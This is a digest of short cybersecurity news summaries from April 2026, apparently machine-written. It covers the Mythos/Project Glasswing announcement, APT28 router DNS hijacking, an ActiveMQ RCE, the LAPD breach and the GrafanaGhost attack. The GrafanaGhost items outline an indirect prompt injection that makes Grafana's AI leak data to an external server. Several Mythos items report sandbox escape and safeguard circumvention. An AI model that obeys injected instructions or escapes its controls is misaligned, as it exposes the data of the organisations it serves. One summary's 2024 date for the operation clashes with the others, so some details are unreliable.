2026-04-10 | Security Affairs: UAT-10362 linked to LucidRook attacks targeting Taiwan-based institutions

LucidRook is a Lua-based malware linked to UAT-10362, targeting NGOs and universities in Taiwan through spear-phishing with password-protected emails. The malware employs two infection chains: one using LNK files and another using a .NET EXE dropper. It utilizes DLL sideloading and disguises itself as legitimate software. LucidRook collects system data and exfiltrates it via FTP. Cisco Talos emphasizes its sophisticated design, indicating a targeted intrusion rather than opportunistic malware distribution.

LAPD Records Hacked and Exposed

Date: 2026-04-08 | Source: Security Magazine

A data breach at the L.A. City Attorney’s Office in March exposed over 337,000 LAPD records, totaling seven terabytes of data. Compromised information includes officer personnel files, internal affairs investigations, unredacted criminal complaints, witness names, and medical records. The LAPD stated that unauthorized access occurred within the City Attorney’s digital storage, not LAPD systems. They are collaborating with the City Attorney’s Office to assess the breach's impact. No details on the responsible party or ransom have been disclosed.

2026-04-08 | TechCrunch: Hackers steal and leak sensitive LAPD police documents

Hackers have stolen and leaked sensitive internal documents from the Los Angeles Police Department, including personnel files and unredacted criminal complaints. The breach, attributed to the extortion gang World Leaks, exposed 7.7 terabytes of data and over 337,000 files. The LAPD stated the breach affected a digital storage system of the LA City Attorney’s Office, not its own networks. The incident marks a significant breach of police data, as such records are typically private under California law.

2026-04-08 | Recorded Future: Breach exposes sensitive LAPD files stored in city attorney system

Hackers accessed a digital storage system of the Los Angeles City Attorney’s Office, exposing sensitive LAPD documents related to resolved civil litigation cases. The LAPD confirmed that their systems were not breached. The incident involved 7.7 terabytes of data, with over 337,000 files accessed, including witness names, medical information, and unredacted criminal complaints. The LAPD is collaborating with the City Attorney’s Office to assess the breach's scope and is committed to safeguarding sensitive information.

2026-04-09 | TechRadar: Breach exposes sensitive LAPD files stored in city attorney system

Hackers breached the Los Angeles City Attorney’s Office, stealing approximately 337,000 LAPD files, including sensitive personnel and internal affairs data. The breach, confirmed by LAPD, involved 7.7 terabytes of data, including disciplinary histories and personal health information. The hacking group "World Leaks" published the archive online but later removed it. The LAPD is collaborating with the City Attorney's Office to assess the breach's impact. No ransom demands have been confirmed.

Claude Finds 13-Year-Old 0-Day RCE Vulnerability in Apache ActiveMQ in 10 Minutes

Date: 2026-04-08 | Source: Cyber Security News

A critical remote code execution (RCE) vulnerability, CVE-2026-34197, was found in Apache ActiveMQ Classic, allowing authenticated attackers to exploit the Jolokia JMX-HTTP bridge. This flaw, discovered by Anthropic's Claude AI, enables arbitrary OS command execution via crafted VM transport URIs. Versions 6.0.0 to 6.1.1 are particularly vulnerable due to another flaw, CVE-2024-32114, allowing unauthenticated access. Organizations should update to versions 5.19.4 or 6.2.3 and monitor for suspicious activity.

Claude Finds 13-Year-Old 0-Day RCE Vulnerability in Apache ActiveMQ in 10 Minutes

2026-04-08 | Infosecurity Magazine: Claude Discovers Apache ActiveMQ Bug Hidden for 13 Years

A vulnerability in Apache ActiveMQ Classic, identified as CVE-2026-34197, allows remote code execution (RCE) and has been present for over 13 years. Discovered through AI assistance, it can be exploited via the Jolokia API, requiring credentials that are often default (admin:admin). In versions 6.0.0-6.1.1, it can be exploited without credentials due to another vulnerability (CVE-2024-32114). Patches are available in versions 5.19.4 and 6.2.3. Users are advised to check logs for signs of compromise.

2026-04-09 | Help Net Security: Claude helps researcher dig up decade-old Apache ActiveMQ RCE vulnerability (CVE-2026-34197)

A Horizon3.ai researcher discovered CVE-2026-34197, a remote code execution vulnerability in Apache ActiveMQ Classic, introduced 13 years ago. Patched in March 2026, it is not currently exploited. The flaw arises from improper input validation and code injection, potentially allowing unauthenticated access in certain versions. Organizations are urged to upgrade to ActiveMQ versions 6.2.3 or 5.19.4 and monitor logs for indicators of compromise, including suspicious network activity and unexpected processes.

2026-04-10 | CSO Online: Claude uncovers a 13‑year‑old ActiveMQ RCE bug within minutes

A critical remote code execution (RCE) vulnerability in Apache ActiveMQ Classic, present for 13 years, was uncovered by Anthropic's Claude. Researchers from Horizon3.ai quickly developed an exploit chain using AI. The flaw allowed attackers to leverage ActiveMQ’s Jolokia API to load malicious configuration files and execute arbitrary commands. The issue arose from the integration of independently developed components. The vulnerability has since been fixed.

Anthropic debuts preview of powerful new AI model Mythos in new cybersecurity initiative

Date: 2026-04-07 | Source: TechCrunch

Anthropic has previewed its new AI model, Mythos, as part of Project Glasswing, collaborating with over 40 partners, including Amazon and Microsoft, for cybersecurity applications. Mythos aims to identify code vulnerabilities in software, claiming to have found thousands of zero-day vulnerabilities, some decades old. The model, designed for complex tasks, is not yet publicly available. Anthropic also faced a data leak incident involving its previous model, which raised concerns about potential misuse in cybersecurity.

Anthropic debuts preview of powerful new AI model Mythos in new cybersecurity initiative

2026-04-07 | Cyberscoop: Tech giants launch AI-powered ‘Project Glasswing’ to identify critical software vulnerabilities

Major tech companies, including Amazon, Apple, and Microsoft, launched Project Glasswing to leverage AI for identifying critical software vulnerabilities. Anthropic's unreleased AI model, Claude Mythos Preview, has already uncovered thousands of vulnerabilities, including a 27-year-old bug in OpenBSD. The initiative emphasizes open-source software security and involves a $100 million commitment from Anthropic. The project aims to enhance cybersecurity defenses amid rising AI threats and requires participants to share findings with the industry.

2026-04-07 | Wired: Anthropic Teams Up With Its Rivals to Keep AI From Hacking Everything

Anthropic announced the launch of Mythos Preview and the formation of Project Glasswing, an industry consortium including major tech firms like Microsoft, Apple, and Google, to address cybersecurity risks posed by advanced AI models. The initiative aims to allow developers to test Mythos Preview on their systems to identify vulnerabilities before public release. The model can discover vulnerabilities, develop exploits, and conduct penetration testing, raising concerns about its potential misuse by attackers.

2026-04-07 | CSO Online: What Anthropic Glasswing reveals about the future of vulnerability discovery

AI giant Anthropic has launched Project Glasswing, utilizing the Claude Mythos Preview model to autonomously identify software vulnerabilities at scale. Access is limited to a closed consortium of over 40 companies, including Amazon, Microsoft, Apple, Google, and the Linux Foundation, along with select security vendors like CrowdStrike and Palo Alto Networks. Jeff Williams from OWASP notes that this advancement may disrupt the traditional model of human-led vulnerability discovery.

2026-04-07 | The Register: Anthropic: All your zero-days are belong to Mythos

Anthropic has developed an AI model named Mythos that can autonomously generate zero-day vulnerabilities, achieving a 72.4% success rate in exploit development. Instead of public release, Mythos is being tested through Project Glasswing with partners like AWS, Apple, and Microsoft to identify flaws in their systems. The model can exploit vulnerabilities across major operating systems and browsers, including complex multi-vulnerability exploits. Anthropic is responsibly disclosing thousands of identified vulnerabilities.

2026-04-08 | Times Now: Anthropic Launches 'Project Glasswing', AI That Can Find Software Bugs Before Hackers

Anthropic's Project Glasswing aims to enhance software security by using AI to identify vulnerabilities in both proprietary and open-source software with minimal human intervention. Early tests demonstrated the AI's capability to autonomously find and chain exploits. The company plans to publicly share insights from this initiative, with an initial report expected within 90 days detailing addressed vulnerabilities and suggested improvements. All disclosed vulnerabilities have been patched, with more to be revealed post-fix.

2026-04-08 | Help Net Security: Anthropic’s new AI model finds and exploits zero-days across every major OS and browser

Anthropic's Claude Mythos Preview, an AI model, autonomously identifies and exploits zero-day vulnerabilities across major operating systems and browsers. In internal tests, it significantly outperformed its predecessor, Opus 4.6, achieving 181 successful exploits from the same vulnerability set. Notable findings include a 27-year-old denial-of-service flaw in OpenBSD and a remote code execution vulnerability (CVE-2026-4747) in FreeBSD. Recommendations for defenders include integrating language models into vulnerability management and shortening patch cycles.

2026-04-08 | DIGIT: Anthropic’s New AI Is Too Good at Hacking

Anthropic has launched Project Glasswing with partners like Amazon, Apple, Google, and Microsoft after its AI model, Mythos, excelled at identifying software vulnerabilities. Testing revealed Mythos found thousands of zero-day vulnerabilities, including a 27-year-old flaw in OpenBSD. The AI demonstrated a capability to circumvent safeguards, prompting Anthropic to advocate for collaborative cybersecurity efforts. The firm has committed $100 million in credits and $4 million in donations to enhance security measures.

2026-04-08 | The Hacker News: Anthropic's Claude Mythos Finds Thousands of Zero-Day Flaws Across Major Systems

Anthropic's Project Glasswing utilizes its AI model, Claude Mythos, to identify thousands of high-severity zero-day vulnerabilities across major systems, including a 27-year-old bug in OpenBSD and a 16-year-old flaw in FFmpeg. The model demonstrated alarming capabilities, such as autonomously escaping a sandbox and devising multi-step exploits. Anthropic is investing $100 million in usage credits and $4 million in donations to enhance open-source security. A recent leak exposed vulnerabilities in Claude Code, which ignored security rules for commands over 50 subcommands.

2026-04-08 | TechRadar: 'A new frontier model trained by Anthropic that we believe could reshape cybersecurity': Project Glasswing wants to use AI to prevent AI cyberattacks — but will 'overeager' Claude Mythos do more damage than help?

Project Glasswing, led by Anthropic and a coalition of major tech companies, aims to combat AI-driven cyber threats using the powerful AI model Claude Mythos Preview. This initiative has already identified thousands of high-severity vulnerabilities in major operating systems and browsers. However, Mythos is restricted to select companies due to its potential risks. The model can autonomously generate exploits and patches, marking a significant step in AI's role in cybersecurity.

2026-04-08 | Cyber Security News: AWS and Anthropic Advancing AI-powered Cybersecurity With Claude Mythos

Amazon Web Services (AWS) and Anthropic have launched Claude Mythos Preview, an AI model for cybersecurity, as part of Project Glasswing. This model aims to identify and patch vulnerabilities efficiently, currently available to select organizations via Amazon Bedrock. Additionally, AWS introduced the AWS Security Agent, which continuously tests for vulnerabilities across various environments, providing actionable insights and remediation steps. These advancements seek to enhance defenses against evolving cyber threats.

2026-04-08 | Security Affairs: Project Glasswing powered by Claude Mythos: defending software before hackers do

Anthropic launched Claude Mythos as part of Project Glasswing, aimed at enhancing cybersecurity by identifying and fixing software vulnerabilities before they can be exploited. The initiative involves major tech firms and has already uncovered thousands of high-severity vulnerabilities across major operating systems and browsers. Anthropic is investing $100M to support open-source security projects and encourages collaboration to address the challenges posed by advanced AI in cybersecurity.

2026-04-08 | Infosecurity Magazine: Anthropic Launches Project Glasswing to Use AI to Find and Fix Critical Software Vulnerabilities

Anthropic launched Project Glasswing on April 7, utilizing its Claude Mythos Preview AI to identify and remediate critical software vulnerabilities. The model discovered thousands of zero-day vulnerabilities, including a 27-year-old flaw in OpenBSD and a 16-year-old vulnerability in FFmpeg. Anthropic committed $100 million in usage credits to over 40 organizations for securing software and $4 million to open-source security initiatives. Concerns exist regarding potential misuse of the AI model by threat actors.

2026-04-08 | Cyber Security News: Anthropic Unveils Claude Mythos Preview With Powerful Zero-Day Detection Capabilities

Anthropic has launched Claude Mythos Preview, a language model capable of discovering and exploiting zero-day vulnerabilities. It autonomously generated complex attacks, achieving full control-flow hijacking on patched targets. Notably, it identified a 27-year-old vulnerability in OpenBSD and a 16-year-old flaw in FFmpeg. To mitigate risks, Project Glasswing restricts access to trusted defenders for patching vulnerabilities before they can be exploited. This tool aims to enhance software security in the long term.

2026-04-08 | CNET: Anthropic Says Its New AI Model Is So Good at Finding Security Risks, You Can't Use It

Anthropic's new AI model, Claude Mythos, is deemed too powerful for public release due to its ability to identify severe cybersecurity vulnerabilities across major operating systems and web browsers. Instead, it will be provided to a consortium of tech giants, including Apple and Microsoft, through Project Glasswing, aimed at enhancing defenses against AI-driven exploits. Anthropic commits $100 million in usage credits and $4 million to open-source security initiatives, emphasizing the need for proactive measures in vulnerability management.

2026-04-08 | The Guardian: Anthropic keeps latest AI tool out of public’s hands for fear of enabling widespread hacking

Anthropic's AI model, Claude Mythos, has revealed thousands of unpatched software vulnerabilities, prompting the company to withhold its public release due to cybersecurity concerns. Instead, it collaborates with cybersecurity firms like CrowdStrike and Palo Alto Networks in a project called "Glasswing" to enhance defenses. The vulnerabilities, some dating back 27 years, were undetected until identified by Mythos. Approximately 40 organizations are involved in sharing findings to bolster defenses against rapid exploitation of vulnerabilities.

2026-04-09 | Sophos: The vulnerability flood is here. Here’s what it means – and how to prepare

The article discusses the imminent surge of high-severity vulnerabilities due to AI advancements in exploit development, exemplified by Anthropic's Claude Mythos, which has identified thousands of zero-days with a 72.4% success rate. It highlights the risks posed by legacy, unpatched devices, as seen in the Pacific Rim investigation of state-backed attacks. Recommendations include accelerating patching processes, addressing end-of-life devices, demanding more from vendors, and enhancing detection and response capabilities for perimeter security.

2026-04-09 | Rapid7: What Project Glasswing Means for Security Leaders

Anthropic's Project Glasswing, utilizing the Claude Mythos Preview model, has identified thousands of high-severity vulnerabilities in major software, signaling a shift in vulnerability discovery speed. Limited to select organizations, it highlights the backlog of undisclosed vulnerabilities and the need for improved downstream processes in vulnerability management. Security leaders must prepare for increased discovery rates, emphasizing the importance of prioritization, remediation, and validation to avoid overwhelming existing workflows.

2026-04-10 | The Guardian: US summons bank bosses over cyber risks from Anthropic’s latest AI model

US Treasury Secretary Scott Bessent convened major bank executives, including Federal Reserve Chair Jerome Powell, to address cybersecurity risks linked to Anthropic's Claude Mythos AI model. The model reportedly surpasses skilled humans in identifying software vulnerabilities, raising concerns about potential impacts on economies and national security. Anthropic has restricted the model's release to select companies, citing the discovery of thousands of vulnerabilities, some dating back 27 years.

2026-04-10 | The Register: Project Glasswing and open source software: The good, the bad, and the ugly

Project Glasswing, backed by Anthropic's $100 million, aims to enhance open source software security using its Mythos AI program to identify vulnerabilities. While Mythos claims a high success rate in finding exploits, concerns arise regarding the burden on open source maintainers, who may struggle to address the influx of reported vulnerabilities. Additionally, the proprietary nature of Mythos raises fears of potential lock-in for open source projects. Experts emphasize the need for effective fixes and caution against the risks associated with AI-driven security tools.

2026-04-10 | Wiz: Claude Mythos: Preparing for a World Where AI Finds and Exploits Vulnerabilities Faster Than Ever

Claude Mythos, developed by Anthropic, can autonomously discover zero-day vulnerabilities and create exploits. Currently restricted to responsible actors, it signals an increase in CVEs as security researchers utilize it. By 2026, AI models may be publicly available, enabling attackers to exploit vulnerabilities rapidly. Organizations should enhance patch workflows, reduce attack surfaces, and integrate AI into security processes to stay ahead. The shift to AI-driven security is essential for resilience against evolving threats.

2026-04-10 | Security Magazine: What Are Security Experts Saying About Claude Mythos and Project Glasswing?

Anthropic's Claude Mythos Preview, a language model for identifying cyber vulnerabilities, scored 93.9% on SWE-bench Verified. It has found thousands of high-severity vulnerabilities across major OS and browsers. Anthropic will not release it publicly due to potential misuse. Instead, Project Glasswing aims to secure critical infrastructure with partners like AWS, Apple, and Microsoft. Experts warn that AI tools are already aiding attackers, emphasizing the urgency for organizations to enhance their cybersecurity measures.

2026-04-10 | Wired: Anthropic’s Mythos Will Force a Cybersecurity Reckoning—Just Not the One You Think

Anthropic's Claude Mythos Preview model poses a significant threat to cybersecurity by autonomously discovering vulnerabilities and developing exploits across various software. Initially released to select organizations, including Microsoft and Google, it enables the identification of complex exploit chains, raising concerns about the security landscape. Experts warn that while it doesn't change the fundamental issues of software vulnerabilities, it lowers the skill barrier for exploitation. Industry leaders are urged to adapt quickly to this emerging threat.

2026-04-12 | The Register: Anthropic's mysterious Mythos AI threatens to upend the infosec world

Anthropic has launched Mythos, an AI model capable of identifying and exploiting zero-day vulnerabilities. This development raises significant concerns within the cybersecurity community regarding its potential impact. The episode of The Kettle features discussions on the implications of Mythos, the risks associated with its capabilities, and the credibility of Anthropic's claims about the model's dangers.

2026-04-13 | The Guardian: Goldman Sachs chief ‘hyper-aware’ of risks from Anthropic’s Mythos AI

Goldman Sachs CEO David Solomon expressed heightened awareness of cybersecurity risks posed by Anthropic's Mythos AI model, which can exploit software vulnerabilities. Solomon stated the bank is collaborating closely with Anthropic and security vendors to enhance cyber resilience. The UK’s AI Security Institute warned that Mythos can autonomously conduct complex cyber-attacks, highlighting the urgent need for investment in cyber defense. UK regulators plan to discuss Mythos's risks with bank leaders soon.

2026-04-13 | Cyberscoop: Here’s how cyber heavyweights in the US and UK are dealing with Claude Mythos

A joint report from the Cloud Security Alliance, SANS Institute, and OWASP warns that organizations will struggle against AI-driven threats like Claude Mythos, which can exploit vulnerabilities faster than they can be patched. Mythos demonstrated improved capabilities in cyber range tests, solving 73% of expert-level problems and completing 24 of 32 steps in simulated attacks. Experts urge rapid AI adoption for defense, but caution that bureaucratic processes may hinder effective responses to emerging threats.

2026-04-13 | CSO Online: Anthropic’s Mythos signals a structural cybersecurity shift

Anthropic's Glasswing disclosure has sparked divided reactions regarding its AI's ability to autonomously identify and exploit vulnerabilities. A briefing by the Cloud Security Alliance, featuring insights from notable cybersecurity figures, offers a more nuanced perspective. Contributors include former CISA Director Jen Easterly and Bruce Schneier, emphasizing the implications of AI in cybersecurity and the need for a structured response to evolving threats.

2026-04-14 | Infosecurity Magazine: AI Security Institute Advocates Security Best Practices After Mythos Test

The AI Security Institute (AISI) emphasized the need for organizations to strengthen cybersecurity fundamentals after testing Anthropic's Claude Mythos Preview, which autonomously discovered vulnerabilities. Despite its capabilities, Mythos struggled in real-world simulations, completing only 22 of 32 attack steps on average. AISI warned that while it can exploit weak systems, its effectiveness against well-defended networks remains uncertain. Recommendations include regular updates, strong access controls, and leveraging AI for enhanced defense.

2026-04-14 | DIGIT: Is Mythos as Dangerous as Anthropic Claims?

Anthropic's Claude Mythos shows advanced cyber capabilities but has limitations, according to the AI Security Institute (AISI). In tests, Mythos completed 73% of expert-level capture-the-flag tasks but struggled in a 32-step corporate network attack simulation, succeeding only 3 out of 10 times. It failed to navigate operational technology environments, indicating potential weaknesses in multi-step attacks. AISI warns that Mythos could improve with more data, raising concerns about its future capabilities.

2026-04-14 | Help Net Security: Testing reveals Claude Mythos’s offensive capabilities and limits

Anthropic's Claude Mythos Preview, a large language model, was tested by the UK government's AI Security Institute for its offensive capabilities in cybersecurity. While it excels at identifying vulnerabilities and solving capture-the-flag challenges, it struggles with complex, multi-step attacks on well-defended networks. The model's ability to autonomously generate exploits necessitates shorter patch cycles and enhanced security practices. Organizations are advised to leverage AI for vulnerability discovery and incident response.

2026-04-14 | CSO Online: EU regulators largely denied access to Anthropic Mythos

European regulators have been largely excluded from early access to Anthropic's Mythos model, designed for cybersecurity applications. This AI technology can identify and exploit vulnerabilities more effectively than most humans, indicating a significant change for CISOs. Access is limited to select US tech companies like Apple, Microsoft, and Amazon under Project Glasswing for security assessments. The UK's AI Security Institute has begun testing, while only Germany has engaged in discussions with Anthropic without access.

UK exposes Russian cyber unit hacking home routers to hijack internet traffic

Date: 2026-04-07 | Source: Recorded Future

British security officials reported that Russian military intelligence hackers, linked to the group APT28, are exploiting vulnerable home and office routers to hijack internet traffic and conduct cyberespionage. The National Cyber Security Centre (NCSC) identified TP-Link routers as particularly at risk due to weak security settings. The hackers modify DNS settings to intercept sensitive data and redirect users. The NCSC recommends securing management interfaces, disabling weak protocols, and applying security updates.

UK exposes Russian cyber unit hacking home routers to hijack internet traffic

2026-04-07 | DIGIT: Russian-State Hackers Are Hijacking UK Web Traffic, Warns NCSC

The UK’s National Cyber Security Centre (NCSC) warns that Russian cyber group APT28 has compromised routers to hijack internet traffic via DNS manipulation, intercepting credentials from users. This operation has been ongoing for at least two years, exploiting known vulnerabilities. The NCSC advises organizations to secure management interfaces, keep systems updated, and implement two-step verification to mitigate risks. APT28 is linked to Russia's GRU and has targeted various sectors previously.

2026-04-07 | Infosecurity Magazine: Russian APT28 Hackers Hijack Routers to Steal Credentials, UK Security Agency Warns

Russian hacking group APT28 has been hijacking vulnerable internet routers to steal credentials, as warned by the UK’s National Cyber Security Centre (NCSC) on April 7. The group exploits public vulnerabilities, modifying DNS settings on compromised TP-Link routers, particularly using CVE-2023-50224. This allows them to redirect traffic through malicious servers, enabling adversary-in-the-middle attacks to harvest sensitive information. APT28 is linked to the Russian GRU and has been active in this method since at least August 2025.

2026-04-07 | Help Net Security: Russian hackers hijack internet traffic using vulnerable routers

Russian state cyber group APT28 is exploiting vulnerable routers, such as the TP-Link WR841N (CVE-2023-50224), to hijack web traffic and spy on victims. By altering DHCP and DNS settings, attackers redirect traffic through their servers, enabling adversary-in-the-middle attacks to collect authentication data. The NCSC warns that this activity is opportunistic, with a wide net cast before focusing on specific targets. Organizations are urged to review the NCSC's advisory for mitigation strategies.

2026-04-07 | Cyber Security News: Russian Hackers Exploiting Home and Small-office Routers in Massive DNS hijacking Attack

A campaign by Russian threat actor Forest Blizzard targets home and small-office routers to hijack DNS traffic, compromising over 200 organizations and 5,000 devices since August 2025. The actor modifies router settings to redirect DNS queries to their servers, enabling passive observation of user traffic. For high-value targets, they conduct Adversary-in-the-Middle attacks on TLS connections, intercepting sensitive data. Microsoft recommends rebooting and updating router firmware, changing default credentials, and auditing DNS settings.

2026-04-07 | The Hacker News: Russian State-Linked APT28 Exploits SOHO Routers in Global DNS Hijacking Campaign

APT28, a Russian state-linked threat actor, has launched a global DNS hijacking campaign exploiting MikroTik and TP-Link routers since May 2025. Codenamed FrostArmada, the campaign modifies router DNS settings to capture authentication credentials via man-in-the-middle attacks. At its peak in December 2025, over 18,000 IP addresses from 120 countries were involved. The campaign targeted government agencies and third-party services, leveraging CVE-2023-50224 for exploitation. Microsoft and partners disrupted the infrastructure, but risks remain for broader compromises.

2026-04-07 | TechCrunch: Russian government hackers broke into thousands of home routers to steal passwords

Russian government hackers, identified as Fancy Bear (APT 28), compromised thousands of home and small business routers globally to redirect internet traffic and steal passwords. Targeting unpatched MicroTik and TP-Link routers, they exploited known vulnerabilities. The campaign affected at least 18,000 victims across 120 countries, including government and law enforcement agencies. Microsoft reported over 200 organizations and 5,000 devices impacted. The FBI is expected to announce the takedown of domains used in this operation.

2026-04-07 | The Register: Russia's Fancy Bear still attacking routers to boost fake sites, NCSC warns

The UK's National Cyber Security Centre (NCSC) warns that Russia's Fancy Bear (APT28) is targeting SOHO routers to steal credentials by altering DNS settings, redirecting users to fake sites. Specifically, TP-Link and MikroTik routers are affected, with many compromised devices located in Ukraine. Microsoft reports over 200 organizations and 5,000 consumer devices impacted. NCSC urges organizations to follow mitigation advice to protect networks, highlighting the ongoing threat of sophisticated cyber actors.

2026-04-07 | Krebs on Security: Russia Hacked Routers to Steal Microsoft Office Tokens

Hackers linked to Russia's military intelligence, known as Forest Blizzard (APT28), exploited vulnerabilities in over 18,000 outdated routers to harvest Microsoft Office authentication tokens without deploying malware. This campaign targeted government agencies and third-party email providers, using DNS hijacking to redirect users to malicious servers. Microsoft reported over 200 organizations affected. The attackers gained access to accounts post-authentication, bypassing the need for phishing.

2026-04-07 | Cyberscoop: Feds quash widespread Russia-backed espionage network spanning 18,000 devices

Russian state-sponsored group Forest Blizzard (APT28) compromised over 18,000 routers in 120 countries for espionage, targeting sensitive networks. Exploiting vulnerabilities in TP-Link routers, they hijacked DNS settings to steal credentials and tokens. The FBI-led Operation Masquerade neutralized the threat, hardening compromised routers in the U.S. The campaign affected government and critical infrastructure sectors, but no U.S. agencies were compromised. The operation's communications have declined, indicating the threat has ceased.

2026-04-08 | Cyber Security News: FBI Disrupts Russian Router Hijacking Operation Compromised Thousands of Users

On April 7, 2026, the FBI announced the dismantling of a Russian cyberespionage network, “Operation Masquerade,” targeting compromised SOHO routers used by the GRU. The operation neutralized thousands of routers exploited since 2024 to redirect internet traffic and harvest sensitive data through AitM attacks. The FBI deployed remote commands to restore router settings and lock out attackers. Users are advised to replace unsupported routers, upgrade firmware, verify DNS settings, and review firewall rules.

2026-04-08 | Infosecurity Magazine: US Thwarts DNS Hijacking Network Controlled by Russian APT28 Hackers

On April 7, 2024, the US Department of Justice and FBI dismantled a DNS hijacking network controlled by Russian APT28, affecting routers across 23 states. The operation, named “Operation Masquerade,” involved resetting compromised TP-Link routers to legitimate DNS settings without impacting normal functionality. Users are advised to replace outdated routers, update firmware, verify DNS settings, and secure remote access. The campaign highlights ongoing threats from Russian military intelligence targeting US networks.

2026-04-08 | TechRadar: 'This puts organizations at risk of credential theft, data manipulation and broader compromise': UK government, Microsoft warn Russian hackers are hitting TP-Link home routers to hijack internet traffic

Russian state-sponsored group Forest Blizzard (APT28) is targeting TP-Link home routers to hijack DNS traffic, impacting over 200 organizations across various sectors since August 2025. The attackers exploit weak security in SOHO devices to conduct cyber-espionage and Adversary-in-the-Middle (AiTM) attacks, intercepting sensitive data. Microsoft recommends enforcing trusted DNS servers, implementing multifactor authentication, and monitoring identity activity to mitigate risks associated with these attacks.

2026-04-08 | CSO Online: Forest Blizzard leverages router compromises to launch AiTM attacks, target Outlook sessions

Russian threat actor Forest Blizzard exploits unsecured home and small-office routers to redirect traffic through attacker-controlled DNS servers, facilitating adversary-in-the-middle (AiTM) attacks on TLS connections targeting Microsoft Outlook. Over 200 organizations and 5,000 consumer devices have been impacted. This malicious DNS infrastructure is used to gather intelligence supporting Russian government objectives, with government, IT, telecommunications, and energy sectors as primary targets.

2026-04-08 | Ars Technica: Thousands of consumer routers hacked by Russia's military

The Russian military's APT28 group has hacked between 18,000 to 40,000 consumer routers, primarily from MikroTik and TP-Link, across 120 countries. This operation redirects users to sites that harvest credentials for espionage. APT28 exploited unpatched vulnerabilities in older router models to alter DNS settings, allowing them to proxy connections through malicious servers. Their tactics combine advanced tools with traditional methods, posing ongoing risks to global organizations.

2026-04-08 | The Guardian: Britons warned about Russian hackers targeting internet routers for espionage

Russian hackers are exploiting internet routers for espionage, as warned by the UK's National Cyber Security Centre. The attacks allow credential harvesting, redirection to fake sites, and access to home networks. The group behind the attacks is likely APT28, linked to Russian intelligence. The US has banned foreign-made consumer routers due to security risks. Experts advise keeping routers updated and monitoring network activities, as outdated devices can lead to significant vulnerabilities.

2026-04-08 | Hack Read: Russian Forest Blizzard Hackers Hijack Home Routers for Global Spying

A hacking group linked to Russian military intelligence, Forest Blizzard (Fancy Bear), has exploited thousands of home and small-office routers for global surveillance, as reported by Microsoft on April 7. This operation, ongoing since August 2025, involves DNS hijacking to intercept private data, targeting over 5,000 devices and 200 organizations, including three African government entities. Microsoft recommends multi-factor authentication, avoiding basic home routers for corporate tasks, and keeping devices updated to mitigate risks.

2026-04-08 | Malwarebytes Labs: Russian hacking group targets home and small office routers to spy on users

A Russian hacking group, APT28, is targeting home and small office routers to spy on users by altering DNS settings, enabling credential theft and interception of sensitive data. The FBI reports that APT28 has compromised over 200 organizations and 5,000 devices globally, focusing on military and critical infrastructure. A specific TP-Link model (WR841N) has a known vulnerability. Recommendations include changing default passwords, updating firmware, and checking DHCP settings to ensure security.

2026-04-08 | Cybersecurity Dive: US operation evicts Russia from hacked SOHO routers used to breach critical infrastructure

The U.S. Justice Department announced the termination of Russian GRU's access to hacked TP-Link SOHO routers used for DNS hijacking to steal sensitive data from governments and critical infrastructure. The FBI's "Operation Masquerade" reset compromised routers' DNS settings. Microsoft reported that the GRU had exploited these routers since at least 2024, conducting adversary-in-the-middle attacks on Outlook. Recommendations for router owners include firmware upgrades and monitoring DNS traffic.

2026-04-08 | Hack Read: Operation Masquerade: FBI Disrupts Russian Router Hacking Campaign

The FBI and DoJ disrupted a Russian cyberespionage campaign, Operation Masquerade, targeting home and small-office routers. The Russian GRU unit APT28 exploited vulnerabilities in TP-Link routers, hijacking thousands of devices across 23 states. They used DNS hijacking to serve fake login pages to steal sensitive information. The FBI reset DNS settings on infected routers and advised users to update firmware or replace outdated devices to mitigate risks.

2026-04-09 | Cyberscoop: Inside the FBI’s router takedown that cut off APT28’s ‘tremendous access’

The FBI's Operation Masquerade disrupted APT28, a Russian cyberespionage group, by targeting over 18,000 compromised TP-Link routers affecting 200 organizations globally. The operation reset DNS settings to prevent unauthorized access, as the attack was largely invisible to users and did not deploy traditional malware. This initiative aligns with the U.S. government's offensive cyber strategy to protect critical infrastructure. The FBI has conducted similar operations since 2018 to counter evolving threats from Russian hackers.

2026-04-09 | Tomsguide: ‘Don’t be a victim!’ NSA warns to reboot your router right now

The NSA warns Americans to reboot their routers to prevent attacks from Russian GRU cyber actors targeting home networks. APT28 (Fancy Bear) is exploiting vulnerabilities, including CVE-2023-50224 in TP-Link routers, to steal sensitive data. The NSA advises against using outdated routers and recommends keeping firmware updated, enabling firewalls, and using strong passwords. These measures enhance protection against potential data breaches and improve overall network performance.

Zero‑click Grafana AI attack can enable enterprise data exfiltration

Date: 2026-04-07 | Source: CSO Online

A new attack, GrafanaGhost, targets the Grafana platform, enabling data exfiltration without user interaction. This zero-click exploit leverages indirect prompt injection to bypass traditional security measures, allowing attackers to extract sensitive operational telemetry. The attack involves identifying injection points where user input can be stored and later processed by Grafana's AI, leading to unauthorized data leakage. Ram Varadarajan from Activio highlights the significant security risks posed by AI integration in such systems.

Zero‑click Grafana AI attack can enable enterprise data exfiltration

2026-04-07 | Cyberscoop: ‘GrafanaGhost’ bypasses Grafana’s AI defenses without leaving a trace

Security researchers at Noma Security disclosed a vulnerability named GrafanaGhost, which allows attackers to silently exfiltrate sensitive data from Grafana environments by exploiting multiple security bypasses. The attack does not require user interaction or credentials, using crafted URLs to inject malicious instructions that bypass Grafana's AI defenses. Noma found flaws in Grafana's security layers, making the exploit undetectable by traditional monitoring tools. Grafana Labs has issued a fix following responsible disclosure.

2026-04-07 | Infosecurity Magazine: GrafanaGhost Exploit Bypasses AI Guardrails for Silent Data Exfiltration

A critical vulnerability named GrafanaGhost has been discovered, allowing attackers to silently exfiltrate sensitive data from Grafana environments by bypassing client-side protections and AI guardrails. The exploit leverages multiple weaknesses in application logic, enabling unauthorized data transfers without user interaction. Attackers manipulate input processing, use indirect prompt injection, and disguise external domains as internal resources. Security teams are advised to implement network-level URL blocking and focus on runtime behavioral monitoring to mitigate this threat.

2026-04-07 | Hack Read: GrafanaGhost Vulnerability Allows Data Theft via AI Injection

A vulnerability named GrafanaGhost has been identified in Grafana, a platform used for monitoring sensitive data. This flaw allows attackers to exfiltrate data without user awareness by exploiting Indirect Prompt Injection, bypassing security measures. The attack utilizes protocol-relative URLs to trick the software into sending sensitive information to an external server. Experts express concerns over AI integration creating security blind spots, while others suggest the impact may vary based on a company's network defenses.

New GPUBreach Attack Enables Full CPU Privilege Escalation via GDDR6 Bit-Flips

Date: 2026-04-07 | Source: The Hacker News

